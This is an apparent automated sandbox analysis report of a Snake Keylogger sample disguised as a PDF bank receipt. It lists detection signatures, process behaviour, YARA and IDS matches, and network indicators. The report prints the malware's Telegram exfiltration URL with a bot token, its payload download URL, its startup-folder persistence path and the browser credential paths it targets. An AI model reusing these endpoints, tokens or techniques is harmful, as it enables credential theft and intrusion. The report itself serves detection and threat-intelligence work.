Windows Analysis Report
e-dekont (72).pdf(#U007e56 KB).exe

Overview

General Information

Sample name: e-dekont (72).pdf(#U007e56 KB).exe
renamed because original name is a hash value
Original sample name: e-dekont (72).pdf(~56 KB).exe
Analysis ID: 1553407
MD5: d99d18dbd5825f0fddef9063b0afdf9c
SHA1: 844a9ea45eec0dc6e5418735dad17fa4c45f589d
SHA256: 73e2cbdbd6ebf0c6fa0a287b375b719b3f576287c7950458d6a75f4e293f7655
Tags: exe, user-threatcat_ch

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • e-dekont (72).pdf(#U007e56 KB).exe (PID: 7088 cmdline: "C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe" MD5: D99D18DBD5825F0FDDEF9063B0AFDF9C)
    • InstallUtil.exe (PID: 1436 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 6556 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • TypeName.exe (PID: 6512 cmdline: "C:\Users\user\AppData\Roaming\TypeName.exe" MD5: D99D18DBD5825F0FDDEF9063B0AFDF9C)
      • InstallUtil.exe (PID: 1476 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8143251474:AAEA0_EQbWwbg-euvwSvaVk0pmsvD34srnA/sendMessage?chat_id=6008123474", "Token": "8143251474:AAEA0_EQbWwbg-euvwSvaVk0pmsvD34srnA", "Chat_id": "6008123474", "Version": "5.1"}
Source | Rule | Description | Author | Strings
00000006.00000002.4475386970.0000000000416000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x822:$a1: get_encryptedPassword
  • 0xb0e:$a2: get_encryptedUsername
  • 0x62e:$a3: get_timePasswordChanged
  • 0x729:$a4: get_passwordField
  • 0x838:$a5: set_encryptedPassword
  • 0x1edc:$a7: get_logins
  • 0x1e3f:$a10: KeyLoggerEventArgs
  • 0x1aaa:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_SnakeKeylogger | Detects Snake Keylogger | ditekSHen
  • 0x19130:$x1: $%SMTPDV$
  • 0x190d8:$x3: %FTPDV$
  • 0x190fc:$m2: Clipboard Logs ID
  • 0x1933a:$m2: Screenshot Logs ID
  • 0x1944a:$m2: keystroke Logs ID
  • 0x19724:$m3: SnakePW
  • 0x19312:$m4: \SnakeKeylogger\
00000000.00000002.2041673043.000000000339C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Source | Rule | Description | Author | Strings
0.2.e-dekont (72).pdf(#U007e56 KB).exe.6b60000.8.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
4.2.TypeName.exe.411fdb0.3.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
4.2.TypeName.exe.411fdb0.3.unpack | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
4.2.TypeName.exe.411fdb0.3.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x12c22:$a1: get_encryptedPassword
  • 0x12f0e:$a2: get_encryptedUsername
  • 0x12a2e:$a3: get_timePasswordChanged
  • 0x12b29:$a4: get_passwordField
  • 0x12c38:$a5: set_encryptedPassword
  • 0x142dc:$a7: get_logins
  • 0x1423f:$a10: KeyLoggerEventArgs
  • 0x13eaa:$a11: KeyLoggerEventArgsEventHandler
4.2.TypeName.exe.411fdb0.3.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x1a63e:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x19870:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x19ca3:$a4: \Orbitum\User Data\Default\Login Data
  • 0x1ace2:$a5: \Kometa\User Data\Default\Login Data

System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs" , ProcessId: 6556, ProcessName: wscript.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs" , ProcessId: 6556, ProcessName: wscript.exe

Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe, ProcessId: 7088, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-11T05:17:10.824223+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.5 | 49721 | TCP
2024-11-11T05:17:49.378677+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.5 | 50009 | TCP
2024-11-11T05:16:58.428709+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | TCP
2024-11-11T05:17:01.848385+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49711 | 188.114.96.3 | 443 | TCP
2024-11-11T05:17:03.078110+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49713 | 188.114.96.3 | 443 | TCP
2024-11-11T05:17:05.539673+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49717 | 188.114.96.3 | 443 | TCP
2024-11-11T05:17:11.909969+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49730 | 188.114.96.3 | 443 | TCP
2024-11-11T05:17:14.709802+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49746 | 188.114.96.3 | 443 | TCP
2024-11-11T05:17:15.949361+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49758 | 188.114.96.3 | 443 | TCP
2024-11-11T05:16:56.352623+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49705 | 132.226.247.73 | 80 | TCP
2024-11-11T05:16:57.930766+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49705 | 132.226.247.73 | 80 | TCP
2024-11-11T05:16:59.149588+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49708 | 132.226.247.73 | 80 | TCP
2024-11-11T05:17:01.368274+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49710 | 132.226.247.73 | 80 | TCP
2024-11-11T05:17:10.149548+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49722 | 132.226.247.73 | 80 | TCP
2024-11-11T05:17:11.415202+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49722 | 132.226.247.73 | 80 | TCP
2024-11-11T05:17:12.666977+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49731 | 132.226.247.73 | 80 | TCP

AV Detection

Source: 00000006.00000002.4477967897.0000000003321000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8143251474:AAEA0_EQbWwbg-euvwSvaVk0pmsvD34srnA/sendMessage?chat_id=6008123474", "Token": "8143251474:AAEA0_EQbWwbg-euvwSvaVk0pmsvD34srnA", "Chat_id": "6008123474", "Version": "5.1"}
Source: e-dekont (72).pdf(#U007e56 KB).exe; Virustotal: Detection: 11%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\TypeName.exe; Joe Sandbox ML: detected
Source: e-dekont (72).pdf(#U007e56 KB).exe; Joe Sandbox ML: detected

Location Tracking

Source: unknown; DNS query: name: reallyfreegeoip.org
Source: e-dekont (72).pdf(#U007e56 KB).exe; Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49725 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: e-dekont (72).pdf(#U007e56 KB).exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052769159.0000000006C90000.00000004.08000000.00040000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.0000000003306000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2181644021.000000000341F000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052769159.0000000006C90000.00000004.08000000.00040000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.0000000003306000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2181644021.000000000341F000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052467032.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052467032.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\

Networking

Source: Yara match; File source: 4.2.TypeName.exe.411fdb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, type: UNPACKEDPE
Source: global traffic; HTTP traffic detected: GET /slim/Tvifaznhqk.mp4 HTTP/1.1, Host: www.oleonidas.gr, Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1, Host: reallyfreegeoip.org, Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1, Host: reallyfreegeoip.org
Source: Joe Sandbox View; IP Address: 188.114.96.3
Source: Joe Sandbox View; IP Address: 132.226.247.73
Source: Joe Sandbox View; JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; DNS query: name: checkip.dyndns.org
Source: unknown; DNS query: name: reallyfreegeoip.org
Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49710 -> 132.226.247.73:80
Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49708 -> 132.226.247.73:80
Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49731 -> 132.226.247.73:80
Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49722 -> 132.226.247.73:80
Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 132.226.247.73:80
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49707 -> 188.114.96.3:443
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49713 -> 188.114.96.3:443
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49717 -> 188.114.96.3:443
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49711 -> 188.114.96.3:443
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49730 -> 188.114.96.3:443
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49758 -> 188.114.96.3:443
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49746 -> 188.114.96.3:443
Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.5:49721
Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.5:50009
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1, User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;), Host: checkip.dyndns.org, Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1, User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;), Host: checkip.dyndns.org
              Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.0
              Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49725 version: TLS 1.0
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic HTTP traffic detected: GET /slim/Tvifaznhqk.mp4 HTTP/1.1 Host: www.oleonidas.gr Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1 Host: reallyfreegeoip.org
              Source: global traffic DNS traffic detected: DNS query: www.oleonidas.gr
              Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
              Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
              Source: InstallUtil.exe String found in binary or memory: http://checkip.dyndns.com
              Source: InstallUtil.exe String found in binary or memory: http://checkip.dyndns.org
              Source: InstallUtil.exe String found in binary or memory: http://checkip.dyndns.org/
              Source: e-dekont (72).pdf(#U007e56 KB).exe, TypeName.exe, InstallUtil.exe String found in binary or memory: http://checkip.dyndns.org/q
              Source: TypeName.exe.0.dr String found in binary or memory: http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008
              Source: InstallUtil.exe String found in binary or memory: http://reallyfreegeoip.org
              Source: e-dekont (72).pdf(#U007e56 KB).exe, InstallUtil.exe, TypeName.exe String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: e-dekont (72).pdf(#U007e56 KB).exe String found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: e-dekont (72).pdf(#U007e56 KB).exe String found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: e-dekont (72).pdf(#U007e56 KB).exe String found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: InstallUtil.exe String found in binary or memory: https://reallyfreegeoip.org
              Source: e-dekont (72).pdf(#U007e56 KB).exe, InstallUtil.exe, TypeName.exe String found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: InstallUtil.exe String found in binary or memory: https://reallyfreegeoip.org/xml/66.23.206.109
              Source: InstallUtil.exe String found in binary or memory: https://reallyfreegeoip.org/xml/66.23.206.109$
              Source: e-dekont (72).pdf(#U007e56 KB).exe String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: e-dekont (72).pdf(#U007e56 KB).exe, TypeName.exe String found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: e-dekont (72).pdf(#U007e56 KB).exe String found in binary or memory: https://stackoverflow.com/q/2152978/23354
              Source: e-dekont (72).pdf(#U007e56 KB).exe, TypeName.exe String found in binary or memory: https://www.oleonidas.gr
              Source: e-dekont (72).pdf(#U007e56 KB).exe, TypeName.exe String found in binary or memory: https://www.oleonidas.gr/slim/Tvifaznhqk.mp4
              Source: unknown HTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49719 version: TLS 1.2

              System Summary

              Source: 4.2.TypeName.exe.411fdb0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 4.2.TypeName.exe.411fdb0.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 4.2.TypeName.exe.411fdb0.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 4.2.TypeName.exe.411fdb0.3.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 4.2.TypeName.exe.411fdb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 4.2.TypeName.exe.411fdb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 4.2.TypeName.exe.411fdb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 4.2.TypeName.exe.411fdb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000006.00000002.4475386970.0000000000416000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000000.00000002.2041673043.000000000339C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000006.00000002.4475386970.0000000000419000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: e-dekont (72).pdf(#U007e56 KB).exe PID: 7088, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: e-dekont (72).pdf(#U007e56 KB).exe PID: 7088, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: TypeName.exe PID: 6512, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: TypeName.exe PID: 6512, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: InstallUtil.exe PID: 1476, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: InstallUtil.exe PID: 1476, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: initial sample Static PE information: Filename: e-dekont (72).pdf(#U007e56 KB).exe
              Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Code function: 0_2_06C867D0 NtResumeThread,0_2_06C867D0
